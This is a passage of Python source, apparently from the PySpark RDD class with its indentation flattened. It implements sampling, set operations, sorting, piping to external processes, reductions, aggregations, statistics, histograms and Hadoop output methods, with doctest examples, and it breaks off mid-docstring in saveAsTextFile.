def takeSample(self, withReplacement, num, seed=None):
"""
Return a fixed-size sampled subset of this RDD.
>>> rdd = sc.parallelize(range(0, 10))
>>> len(rdd.takeSample(True, 20, 1))
20
>>> len(rdd.takeSample(False, 5, 2))
5
>>> len(rdd.takeSample(False, 15, 3))
10
"""
numStDev = 10.0
if num < 0:
raise ValueError("Sample size cannot be negative.")
elif num == 0:
return []
initialCount = self.count()
if initialCount == 0:
return []
rand = random.Random(seed)
if (not withReplacement) and num >= initialCount:
# shuffle current RDD and return
samples = self.collect()
rand.shuffle(samples)
return samples
maxSampleSize = sys.maxsize - int(numStDev * sqrt(sys.maxsize))
if num > maxSampleSize:
raise ValueError(
"Sample size cannot be greater than %d." % maxSampleSize)
fraction = RDD._computeFractionForSampleSize(
num, initialCount, withReplacement)
samples = self.sample(withReplacement, fraction, seed).collect()
# If the first sample didn't turn out large enough, keep trying to take samples;
# this shouldn't happen often because we use a big multiplier for their initial size.
# See: scala/spark/RDD.scala
while len(samples) < num:
# TODO: add log warning for when more than one iteration was run
seed = rand.randint(0, sys.maxsize)
samples = self.sample(withReplacement, fraction, seed).collect()
rand.shuffle(samples)
return samples[0:num]
@staticmethod
def _computeFractionForSampleSize(sampleSizeLowerBound, total, withReplacement):
"""
Returns a sampling rate that guarantees a sample of
size >= sampleSizeLowerBound 99.99% of the time.
How the sampling rate is determined:
Let p = num / total, where num is the sample size and total is the
total number of data points in the RDD. We're trying to compute
q > p such that
- when sampling with replacement, we're drawing each data point
with prob_i ~ Pois(q), where we want to guarantee
Pr[s < num] < 0.0001 for s = sum(prob_i for i from 0 to
total), i.e. the failure rate of not having a sufficiently large
sample < 0.0001. Setting q = p + 5 * sqrt(p/total) is sufficient
to guarantee 0.9999 success rate for num > 12, but we need a
slightly larger q (9 empirically determined).
- when sampling without replacement, we're drawing each data point
with prob_i ~ Binomial(total, fraction) and our choice of q
guarantees 1-delta, or 0.9999 success rate, where success rate is
defined the same as in sampling with replacement.
"""
fraction = float(sampleSizeLowerBound) / total
if withReplacement:
numStDev = 5
if (sampleSizeLowerBound < 12):
numStDev = 9
return fraction + numStDev * sqrt(fraction / total)
else:
delta = 0.00005
gamma = - log(delta) / total
return min(1, fraction + gamma + sqrt(gamma * gamma + 2 * gamma * fraction))
def union(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> rdd.union(rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if self._jrdd_deserializer == other._jrdd_deserializer:
rdd = RDD(self._jrdd.union(other._jrdd), self.ctx,
self._jrdd_deserializer)
else:
# These RDDs contain data in different serialized formats, so we
# must normalize them to the default serializer.
self_copy = self._reserialize()
other_copy = other._reserialize()
rdd = RDD(self_copy._jrdd.union(other_copy._jrdd), self.ctx,
self.ctx.serializer)
if (self.partitioner == other.partitioner and
self.getNumPartitions() == rdd.getNumPartitions()):
rdd.partitioner = self.partitioner
return rdd
def intersection(self, other):
"""
Return the intersection of this RDD and another one. The output will
not contain any duplicate elements, even if the input RDDs did.
Note that this method performs a shuffle internally.
>>> rdd1 = sc.parallelize([1, 10, 2, 3, 4, 5])
>>> rdd2 = sc.parallelize([1, 6, 2, 3, 7, 8])
>>> rdd1.intersection(rdd2).collect()
[1, 2, 3]
"""
return self.map(lambda v: (v, None)) \
.cogroup(other.map(lambda v: (v, None))) \
.filter(lambda k_vs: all(k_vs[1])) \
.keys()
def _reserialize(self, serializer=None):
serializer = serializer or self.ctx.serializer
if self._jrdd_deserializer != serializer:
self = self.map(lambda x: x, preservesPartitioning=True)
self._jrdd_deserializer = serializer
return self
def __add__(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> (rdd + rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if not isinstance(other, RDD):
raise TypeError
return self.union(other)
def repartitionAndSortWithinPartitions(self, numPartitions=None, partitionFunc=portable_hash,
ascending=True, keyfunc=lambda x: x):
"""
Repartition the RDD according to the given partitioner and, within each resulting partition,
sort records by their keys.
>>> rdd = sc.parallelize([(0, 5), (3, 8), (2, 6), (0, 8), (3, 8), (1, 3)])
>>> rdd2 = rdd.repartitionAndSortWithinPartitions(2, lambda x: x % 2, 2)
>>> rdd2.glom().collect()
[[(0, 5), (0, 8), (2, 6)], [(1, 3), (3, 8), (3, 8)]]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
memory = _parse_memory(self.ctx._conf.get("spark.python.worker.memory", "512m"))
serializer = self._jrdd_deserializer
def sortPartition(iterator):
sort = ExternalSorter(memory * 0.9, serializer).sorted
return iter(sort(iterator, key=lambda k_v: keyfunc(k_v[0]), reverse=(not ascending)))
return self.partitionBy(numPartitions, partitionFunc).mapPartitions(sortPartition, True)
def sortByKey(self, ascending=True, numPartitions=None, keyfunc=lambda x: x):
"""
Sorts this RDD, which is assumed to consist of (key, value) pairs.
# noqa
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortByKey().first()
('1', 3)
>>> sc.parallelize(tmp).sortByKey(True, 1).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> sc.parallelize(tmp).sortByKey(True, 2).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> tmp2 = [('Mary', 1), ('had', 2), ('a', 3), ('little', 4), ('lamb', 5)]
>>> tmp2.extend([('whose', 6), ('fleece', 7), ('was', 8), ('white', 9)])
>>> sc.parallelize(tmp2).sortByKey(True, 3, keyfunc=lambda k: k.lower()).collect()
[('a', 3), ('fleece', 7), ('had', 2), ('lamb', 5),...('white', 9), ('whose', 6)]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
memory = self._memory_limit()
serializer = self._jrdd_deserializer
def sortPartition(iterator):
sort = ExternalSorter(memory * 0.9, serializer).sorted
return iter(sort(iterator, key=lambda kv: keyfunc(kv[0]), reverse=(not ascending)))
if numPartitions == 1:
if self.getNumPartitions() > 1:
self = self.coalesce(1)
return self.mapPartitions(sortPartition, True)
# first compute the boundary of each part via sampling: we want to partition
# the key-space into bins such that the bins have roughly the same
# number of (key, value) pairs falling into them
rddSize = self.count()
if not rddSize:
return self # empty RDD
maxSampleSize = numPartitions * 20.0 # constant from Spark's RangePartitioner
fraction = min(maxSampleSize / max(rddSize, 1), 1.0)
samples = self.sample(False, fraction, 1).map(lambda kv: kv[0]).collect()
samples = sorted(samples, key=keyfunc)
# we have numPartitions many parts but one of the them has
# an implicit boundary
bounds = [samples[int(len(samples) * (i + 1) / numPartitions)]
for i in range(0, numPartitions - 1)]
def rangePartitioner(k):
p = bisect.bisect_left(bounds, keyfunc(k))
if ascending:
return p
else:
return numPartitions - 1 - p
return self.partitionBy(numPartitions, rangePartitioner).mapPartitions(sortPartition, True)
def sortBy(self, keyfunc, ascending=True, numPartitions=None):
"""
Sorts this RDD by the given keyfunc
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[0]).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[1]).collect()
[('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
"""
return self.keyBy(keyfunc).sortByKey(ascending, numPartitions).values()
def glom(self):
"""
Return an RDD created by coalescing all elements within each partition
into a list.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> sorted(rdd.glom().collect())
[[1, 2], [3, 4]]
"""
def func(iterator):
yield list(iterator)
return self.mapPartitions(func)
def cartesian(self, other):
"""
Return the Cartesian product of this RDD and another one, that is, the
RDD of all pairs of elements C{(a, b)} where C{a} is in C{self} and
C{b} is in C{other}.
>>> rdd = sc.parallelize([1, 2])
>>> sorted(rdd.cartesian(rdd).collect())
[(1, 1), (1, 2), (2, 1), (2, 2)]
"""
# Due to batching, we can't use the Java cartesian method.
deserializer = CartesianDeserializer(self._jrdd_deserializer,
other._jrdd_deserializer)
return RDD(self._jrdd.cartesian(other._jrdd), self.ctx, deserializer)
def groupBy(self, f, numPartitions=None, partitionFunc=portable_hash):
"""
Return an RDD of grouped items.
>>> rdd = sc.parallelize([1, 1, 2, 3, 5, 8])
>>> result = rdd.groupBy(lambda x: x % 2).collect()
>>> sorted([(x, sorted(y)) for (x, y) in result])
[(0, [2, 8]), (1, [1, 1, 3, 5])]
"""
return self.map(lambda x: (f(x), x)).groupByKey(numPartitions, partitionFunc)
@ignore_unicode_prefix
def pipe(self, command, env=None, checkCode=False):
"""
Return an RDD created by piping elements to a forked external process.
>>> sc.parallelize(['1', '2', '', '3']).pipe('cat').collect()
[u'1', u'2', u'', u'3']
:param checkCode: whether or not to check the return value of the shell command.
"""
if env is None:
env = dict()
def func(iterator):
pipe = Popen(
shlex.split(command), env=env, stdin=PIPE, stdout=PIPE)
def pipe_objs(out):
for obj in iterator:
s = str(obj).rstrip('\n') + '\n'
out.write(s.encode('utf-8'))
out.close()
Thread(target=pipe_objs, args=[pipe.stdin]).start()
def check_return_code():
pipe.wait()
if checkCode and pipe.returncode:
raise Exception("Pipe function `%s' exited "
"with error code %d" % (command, pipe.returncode))
else:
for i in range(0):
yield i
return (x.rstrip(b'\n').decode('utf-8') for x in
chain(iter(pipe.stdout.readline, b''), check_return_code()))
return self.mapPartitions(func)
def foreach(self, f):
"""
Applies a function to all elements of this RDD.
>>> def f(x): print(x)
>>> sc.parallelize([1, 2, 3, 4, 5]).foreach(f)
"""
def processPartition(iterator):
for x in iterator:
f(x)
return iter([])
self.mapPartitions(processPartition).count() # Force evaluation
def foreachPartition(self, f):
"""
Applies a function to each partition of this RDD.
>>> def f(iterator):
... for x in iterator:
... print(x)
>>> sc.parallelize([1, 2, 3, 4, 5]).foreachPartition(f)
"""
def func(it):
r = f(it)
try:
return iter(r)
except TypeError:
return iter([])
self.mapPartitions(func).count() # Force evaluation
def collect(self):
"""
Return a list that contains all of the elements in this RDD.
"""
with SCCallSiteSync(self.context) as css:
port = self.ctx._jvm.PythonRDD.collectAndServe(self._jrdd.rdd())
return list(_load_from_socket(port, self._jrdd_deserializer))
def reduce(self, f):
"""
Reduces the elements of this RDD using the specified commutative and
associative binary operator. Currently reduces partitions locally.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).reduce(add)
15
>>> sc.parallelize((2 for _ in range(10))).map(lambda x: 1).cache().reduce(add)
10
>>> sc.parallelize([]).reduce(add)
Traceback (most recent call last):
...
ValueError: Can not reduce() empty RDD
"""
def func(iterator):
iterator = iter(iterator)
try:
initial = next(iterator)
except StopIteration:
return
yield reduce(f, iterator, initial)
vals = self.mapPartitions(func).collect()
if vals:
return reduce(f, vals)
raise ValueError("Can not reduce() empty RDD")
def treeReduce(self, f, depth=2):
"""
Reduces the elements of this RDD in a multi-level tree pattern.
:param depth: suggested depth of the tree (default: 2)
>>> add = lambda x, y: x + y
>>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10)
>>> rdd.treeReduce(add)
-5
>>> rdd.treeReduce(add, 1)
-5
>>> rdd.treeReduce(add, 2)
-5
>>> rdd.treeReduce(add, 5)
-5
>>> rdd.treeReduce(add, 10)
-5
"""
if depth < 1:
raise ValueError("Depth cannot be smaller than 1 but got %d." % depth)
zeroValue = None, True # Use the second entry to indicate whether this is a dummy value.
def op(x, y):
if x[1]:
return y
elif y[1]:
return x
else:
return f(x[0], y[0]), False
reduced = self.map(lambda x: (x, False)).treeAggregate(zeroValue, op, op, depth)
if reduced[1]:
raise ValueError("Cannot reduce empty RDD.")
return reduced[0]
def fold(self, zeroValue, op):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given associative and commutative function and
a neutral "zero value."
The function C{op(t1, t2)} is allowed to modify C{t1} and return it
as its result value to avoid object allocation; however, it should not
modify C{t2}.
This behaves somewhat differently from fold operations implemented
for non-distributed collections in functional languages like Scala.
This fold operation may be applied to partitions individually, and then
fold those results into the final result, rather than apply the fold
to each element sequentially in some defined ordering. For functions
that are not commutative, the result may differ from that of a fold
applied to a non-distributed collection.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).fold(0, add)
15
"""
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = op(obj, acc)
yield acc
# collecting result of mapPartitions here ensures that the copy of
# zeroValue provided to each partition is unique from the one provided
# to the final reduce call
vals = self.mapPartitions(func).collect()
return reduce(op, vals, zeroValue)
def aggregate(self, zeroValue, seqOp, combOp):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given combine functions and a neutral "zero
value."
The functions C{op(t1, t2)} is allowed to modify C{t1} and return it
as its result value to avoid object allocation; however, it should not
modify C{t2}.
The first function (seqOp) can return a different result type, U, than
the type of this RDD. Thus, we need one operation for merging a T into
an U and one operation for merging two U
>>> seqOp = (lambda x, y: (x[0] + y, x[1] + 1))
>>> combOp = (lambda x, y: (x[0] + y[0], x[1] + y[1]))
>>> sc.parallelize([1, 2, 3, 4]).aggregate((0, 0), seqOp, combOp)
(10, 4)
>>> sc.parallelize([]).aggregate((0, 0), seqOp, combOp)
(0, 0)
"""
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = seqOp(acc, obj)
yield acc
# collecting result of mapPartitions here ensures that the copy of
# zeroValue provided to each partition is unique from the one provided
# to the final reduce call
vals = self.mapPartitions(func).collect()
return reduce(combOp, vals, zeroValue)
def treeAggregate(self, zeroValue, seqOp, combOp, depth=2):
"""
Aggregates the elements of this RDD in a multi-level tree
pattern.
:param depth: suggested depth of the tree (default: 2)
>>> add = lambda x, y: x + y
>>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10)
>>> rdd.treeAggregate(0, add, add)
-5
>>> rdd.treeAggregate(0, add, add, 1)
-5
>>> rdd.treeAggregate(0, add, add, 2)
-5
>>> rdd.treeAggregate(0, add, add, 5)
-5
>>> rdd.treeAggregate(0, add, add, 10)
-5
"""
if depth < 1:
raise ValueError("Depth cannot be smaller than 1 but got %d." % depth)
if self.getNumPartitions() == 0:
return zeroValue
def aggregatePartition(iterator):
acc = zeroValue
for obj in iterator:
acc = seqOp(acc, obj)
yield acc
partiallyAggregated = self.mapPartitions(aggregatePartition)
numPartitions = partiallyAggregated.getNumPartitions()
scale = max(int(ceil(pow(numPartitions, 1.0 / depth))), 2)
# If creating an extra level doesn't help reduce the wall-clock time, we stop the tree
# aggregation.
while numPartitions > scale + numPartitions / scale:
numPartitions /= scale
curNumPartitions = int(numPartitions)
def mapPartition(i, iterator):
for obj in iterator:
yield (i % curNumPartitions, obj)
partiallyAggregated = partiallyAggregated \
.mapPartitionsWithIndex(mapPartition) \
.reduceByKey(combOp, curNumPartitions) \
.values()
return partiallyAggregated.reduce(combOp)
def max(self, key=None):
"""
Find the maximum item in this RDD.
:param key: A function used to generate key for comparing
>>> rdd = sc.parallelize([1.0, 5.0, 43.0, 10.0])
>>> rdd.max()
43.0
>>> rdd.max(key=str)
5.0
"""
if key is None:
return self.reduce(max)
return self.reduce(lambda a, b: max(a, b, key=key))
def min(self, key=None):
"""
Find the minimum item in this RDD.
:param key: A function used to generate key for comparing
>>> rdd = sc.parallelize([2.0, 5.0, 43.0, 10.0])
>>> rdd.min()
2.0
>>> rdd.min(key=str)
10.0
"""
if key is None:
return self.reduce(min)
return self.reduce(lambda a, b: min(a, b, key=key))
def sum(self):
"""
Add up the elements in this RDD.
>>> sc.parallelize([1.0, 2.0, 3.0]).sum()
6.0
"""
return self.mapPartitions(lambda x: [sum(x)]).fold(0, operator.add)
def count(self):
"""
Return the number of elements in this RDD.
>>> sc.parallelize([2, 3, 4]).count()
3
"""
return self.mapPartitions(lambda i: [sum(1 for _ in i)]).sum()
def stats(self):
"""
Return a L{StatCounter} object that captures the mean, variance
and count of the RDD's elements in one operation.
"""
def redFunc(left_counter, right_counter):
return left_counter.mergeStats(right_counter)
return self.mapPartitions(lambda i: [StatCounter(i)]).reduce(redFunc)
def histogram(self, buckets):
"""
Compute a histogram using the provided buckets. The buckets
are all open to the right except for the last which is closed.
e.g. [1,10,20,50] means the buckets are [1,10) [10,20) [20,50],
which means 1<=x<10, 10<=x<20, 20<=x<=50. And on the input of 1
and 50 we would have a histogram of 1,0,1.
If your histogram is evenly spaced (e.g. [0, 10, 20, 30]),
this can be switched from an O(log n) inseration to O(1) per
element(where n = # buckets).
Buckets must be sorted and not contain any duplicates, must be
at least two elements.
If `buckets` is a number, it will generates buckets which are
evenly spaced between the minimum and maximum of the RDD. For
example, if the min value is 0 and the max is 100, given buckets
as 2, the resulting buckets will be [0,50) [50,100]. buckets must
be at least 1 If the RDD contains infinity, NaN throws an exception
If the elements in RDD do not vary (max == min) always returns
a single bucket.
It will return an tuple of buckets and histogram.
>>> rdd = sc.parallelize(range(51))
>>> rdd.histogram(2)
([0, 25, 50], [25, 26])
>>> rdd.histogram([0, 5, 25, 50])
([0, 5, 25, 50], [5, 20, 26])
>>> rdd.histogram([0, 15, 30, 45, 60]) # evenly spaced buckets
([0, 15, 30, 45, 60], [15, 15, 15, 6])
>>> rdd = sc.parallelize(["ab", "ac", "b", "bd", "ef"])
>>> rdd.histogram(("a", "b", "c"))
(('a', 'b', 'c'), [2, 2])
"""
if isinstance(buckets, int):
if buckets < 1:
raise ValueError("number of buckets must be >= 1")
# filter out non-comparable elements
def comparable(x):
if x is None:
return False
if type(x) is float and isnan(x):
return False
return True
filtered = self.filter(comparable)
# faster than stats()
def minmax(a, b):
return min(a[0], b[0]), max(a[1], b[1])
try:
minv, maxv = filtered.map(lambda x: (x, x)).reduce(minmax)
except TypeError as e:
if " empty " in str(e):
raise ValueError("can not generate buckets from empty RDD")
raise
if minv == maxv or buckets == 1:
return [minv, maxv], [filtered.count()]
try:
inc = (maxv - minv) / buckets
except TypeError:
raise TypeError("Can not generate buckets with non-number in RDD")
if isinf(inc):
raise ValueError("Can not generate buckets with infinite value")
# keep them as integer if possible
inc = int(inc)
if inc * buckets != maxv - minv:
inc = (maxv - minv) * 1.0 / buckets
buckets = [i * inc + minv for i in range(buckets)]
buckets.append(maxv) # fix accumulated error
even = True
elif isinstance(buckets, (list, tuple)):
if len(buckets) < 2:
raise ValueError("buckets should have more than one value")
if any(i is None or isinstance(i, float) and isnan(i) for i in buckets):
raise ValueError("can not have None or NaN in buckets")
if sorted(buckets) != list(buckets):
raise ValueError("buckets should be sorted")
if len(set(buckets)) != len(buckets):
raise ValueError("buckets should not contain duplicated values")
minv = buckets[0]
maxv = buckets[-1]
even = False
inc = None
try:
steps = [buckets[i + 1] - buckets[i] for i in range(len(buckets) - 1)]
except TypeError:
pass # objects in buckets do not support '-'
else:
if max(steps) - min(steps) < 1e-10: # handle precision errors
even = True
inc = (maxv - minv) / (len(buckets) - 1)
else:
raise TypeError("buckets should be a list or tuple or number(int or long)")
def histogram(iterator):
counters = [0] * len(buckets)
for i in iterator:
if i is None or (type(i) is float and isnan(i)) or i > maxv or i < minv:
continue
t = (int((i - minv) / inc) if even
else bisect.bisect_right(buckets, i) - 1)
counters[t] += 1
# add last two together
last = counters.pop()
counters[-1] += last
return [counters]
def mergeCounters(a, b):
return [i + j for i, j in zip(a, b)]
return buckets, self.mapPartitions(histogram).reduce(mergeCounters)
def mean(self):
"""
Compute the mean of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).mean()
2.0
"""
return self.stats().mean()
def variance(self):
"""
Compute the variance of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).variance()
0.666...
"""
return self.stats().variance()
def stdev(self):
"""
Compute the standard deviation of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).stdev()
0.816...
"""
return self.stats().stdev()
def sampleStdev(self):
"""
Compute the sample standard deviation of this RDD's elements (which
corrects for bias in estimating the standard deviation by dividing by
N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleStdev()
1.0
"""
return self.stats().sampleStdev()
def sampleVariance(self):
"""
Compute the sample variance of this RDD's elements (which corrects
for bias in estimating the variance by dividing by N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleVariance()
1.0
"""
return self.stats().sampleVariance()
def countByValue(self):
"""
Return the count of each unique value in this RDD as a dictionary of
(value, count) pairs.
>>> sorted(sc.parallelize([1, 2, 1, 2, 2], 2).countByValue().items())
[(1, 2), (2, 3)]
"""
def countPartition(iterator):
counts = defaultdict(int)
for obj in iterator:
counts[obj] += 1
yield counts
def mergeMaps(m1, m2):
for k, v in m2.items():
m1[k] += v
return m1
return self.mapPartitions(countPartition).reduce(mergeMaps)
def top(self, num, key=None):
"""
Get the top N elements from a RDD.
Note: It returns the list sorted in descending order.
>>> sc.parallelize([10, 4, 2, 12, 3]).top(1)
[12]
>>> sc.parallelize([2, 3, 4, 5, 6], 2).top(2)
[6, 5]
>>> sc.parallelize([10, 4, 2, 12, 3]).top(3, key=str)
[4, 3, 2]
"""
def topIterator(iterator):
yield heapq.nlargest(num, iterator, key=key)
def merge(a, b):
return heapq.nlargest(num, a + b, key=key)
return self.mapPartitions(topIterator).reduce(merge)
def takeOrdered(self, num, key=None):
"""
Get the N elements from a RDD ordered in ascending order or as
specified by the optional key function.
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7]).takeOrdered(6)
[1, 2, 3, 4, 5, 6]
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7], 2).takeOrdered(6, key=lambda x: -x)
[10, 9, 7, 6, 5, 4]
"""
def merge(a, b):
return heapq.nsmallest(num, a + b, key)
return self.mapPartitions(lambda it: [heapq.nsmallest(num, it, key)]).reduce(merge)
def take(self, num):
"""
Take the first num elements of the RDD.
It works by first scanning one partition, and use the results from
that partition to estimate the number of additional partitions needed
to satisfy the limit.
Translated from the Scala implementation in RDD#take().
>>> sc.parallelize([2, 3, 4, 5, 6]).cache().take(2)
[2, 3]
>>> sc.parallelize([2, 3, 4, 5, 6]).take(10)
[2, 3, 4, 5, 6]
>>> sc.parallelize(range(100), 100).filter(lambda x: x > 90).take(3)
[91, 92, 93]
"""
items = []
totalParts = self.getNumPartitions()
partsScanned = 0
while len(items) < num and partsScanned < totalParts:
# The number of partitions to try in this iteration.
# It is ok for this number to be greater than totalParts because
# we actually cap it at totalParts in runJob.
numPartsToTry = 1
if partsScanned > 0:
# If we didn't find any rows after the previous iteration,
# quadruple and retry. Otherwise, interpolate the number of
# partitions we need to try, but overestimate it by 50%.
# We also cap the estimation in the end.
if len(items) == 0:
numPartsToTry = partsScanned * 4
else:
# the first paramter of max is >=1 whenever partsScanned >= 2
numPartsToTry = int(1.5 * num * partsScanned / len(items)) - partsScanned
numPartsToTry = min(max(numPartsToTry, 1), partsScanned * 4)
left = num - len(items)
def takeUpToNumLeft(iterator):
iterator = iter(iterator)
taken = 0
while taken < left:
yield next(iterator)
taken += 1
p = range(partsScanned, min(partsScanned + numPartsToTry, totalParts))
res = self.context.runJob(self, takeUpToNumLeft, p)
items += res
partsScanned += numPartsToTry
return items[:num]
def first(self):
"""
Return the first element in this RDD.
>>> sc.parallelize([2, 3, 4]).first()
2
>>> sc.parallelize([]).first()
Traceback (most recent call last):
...
ValueError: RDD is empty
"""
rs = self.take(1)
if rs:
return rs[0]
raise ValueError("RDD is empty")
def isEmpty(self):
"""
Returns true if and only if the RDD contains no elements at all. Note that an RDD
may be empty even when it has at least 1 partition.
>>> sc.parallelize([]).isEmpty()
True
>>> sc.parallelize([1]).isEmpty()
False
"""
return self.getNumPartitions() == 0 or len(self.take(1)) == 0
def saveAsNewAPIHadoopDataset(self, conf, keyConverter=None, valueConverter=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the new Hadoop OutputFormat API (mapreduce package). Keys/values are
converted for output using either user specified converters or, by default,
L{org.apache.spark.api.python.JavaToWritableConverter}.
:param conf: Hadoop job configuration, passed in as a dict
:param keyConverter: (None by default)
:param valueConverter: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopDataset(pickledRDD._jrdd, True, jconf,
keyConverter, valueConverter, True)
def saveAsNewAPIHadoopFile(self, path, outputFormatClass, keyClass=None, valueClass=None,
keyConverter=None, valueConverter=None, conf=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the new Hadoop OutputFormat API (mapreduce package). Key and value types
will be inferred if not specified. Keys and values are converted for output using either
user specified converters or L{org.apache.spark.api.python.JavaToWritableConverter}. The
C{conf} is applied on top of the base Hadoop conf associated with the SparkContext
of this RDD to create a merged Hadoop MapReduce job configuration for saving the data.
:param path: path to Hadoop file
:param outputFormatClass: fully qualified classname of Hadoop OutputFormat
(e.g. "org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.IntWritable", None by default)
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.Text", None by default)
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop job configuration, passed in as a dict (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsNewAPIHadoopFile(pickledRDD._jrdd, True, path,
outputFormatClass,
keyClass, valueClass,
keyConverter, valueConverter, jconf)
def saveAsHadoopDataset(self, conf, keyConverter=None, valueConverter=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the old Hadoop OutputFormat API (mapred package). Keys/values are
converted for output using either user specified converters or, by default,
L{org.apache.spark.api.python.JavaToWritableConverter}.
:param conf: Hadoop job configuration, passed in as a dict
:param keyConverter: (None by default)
:param valueConverter: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopDataset(pickledRDD._jrdd, True, jconf,
keyConverter, valueConverter, False)
def saveAsHadoopFile(self, path, outputFormatClass, keyClass=None, valueClass=None,
keyConverter=None, valueConverter=None, conf=None,
compressionCodecClass=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the old Hadoop OutputFormat API (mapred package). Key and value types
will be inferred if not specified. Keys and values are converted for output using either
user specified converters or L{org.apache.spark.api.python.JavaToWritableConverter}. The
C{conf} is applied on top of the base Hadoop conf associated with the SparkContext
of this RDD to create a merged Hadoop MapReduce job configuration for saving the data.
:param path: path to Hadoop file
:param outputFormatClass: fully qualified classname of Hadoop OutputFormat
(e.g. "org.apache.hadoop.mapred.SequenceFileOutputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.IntWritable", None by default)
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.Text", None by default)
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: (None by default)
:param compressionCodecClass: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopFile(pickledRDD._jrdd, True, path,
outputFormatClass,
keyClass, valueClass,
keyConverter, valueConverter,
jconf, compressionCodecClass)
def saveAsSequenceFile(self, path, compressionCodecClass=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the L{org.apache.hadoop.io.Writable} types that we convert from the
RDD's key and value types. The mechanism is as follows:
1. Pyrolite is used to convert pickled Python RDD into RDD of Java objects.
2. Keys and values of this Java RDD are converted to Writables and written out.
:param path: path to sequence file
:param compressionCodecClass: (None by default)
"""
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsSequenceFile(pickledRDD._jrdd, True,
path, compressionCodecClass)
def saveAsPickleFile(self, path, batchSize=10):
"""
Save this RDD as a SequenceFile of serialized objects. The serializer
used is L{pyspark.serializers.PickleSerializer}, default batch size
is 10.
>>> tmpFile = NamedTemporaryFile(delete=True)
>>> tmpFile.close()
>>> sc.parallelize([1, 2, 'spark', 'rdd']).saveAsPickleFile(tmpFile.name, 3)
>>> sorted(sc.pickleFile(tmpFile.name, 5).map(str).collect())
['1', '2', 'rdd', 'spark']
"""
if batchSize == 0:
ser = AutoBatchedSerializer(PickleSerializer())
else:
ser = BatchedSerializer(PickleSerializer(), batchSize)
self._reserialize(ser)._jrdd.saveAsObjectFile(path)
@ignore_unicode_prefix
def saveAsTextFile(self, path, compressionCodecClass=None):
"""
Save this RDD as a text file, using string representations of elements.
@param path: path to text file
@param compressionCodecClass: (None by default) string i.e.
"org.apache.hadoop.io.compress.GzipCodec"
>>> tempFile = NamedTemporaryFile(delete=True)
>>> tempFile.close()
>>> sc.parallelize(range(10)).saveAsTextFile(tempFile.name)
>>> from fileinput import input
>>> from glob import glob
>>> ''.join(sorted(input(glob(tempFile.name + "/part-0000*"))))
'0\\n1\\n2\\n3\\n4\\n5\\n6\\n7\\n8\\n9\\n'
Empty lines are tolerated when saving to text files.
>>> tempFile2 = NamedTemporaryFile(delete=True)
>>> tempFile2.close()
>>> sc.parallelize(['', 'foo', '', 'bar', '']).saveAsTextFile(tempFile2.name)
>>> ''.join(sorted(input(glob(tempFile2.name + "/part-0000*"))))
'\\n\\n\\nbar\\nfoo\\n'
Using compressionCodecClass
>>> tempFile3 = NamedTemporaryFile(delete=True)
>>> tempFile3.close()
>>> codec = "org.apache.hadoop.io.compress.GzipCodec"
>>> sc.parallelize(['foo', 'bar']).saveAsTextFile(tempFile3.name, codec)
>>> from fileinput import input, hook_compressed
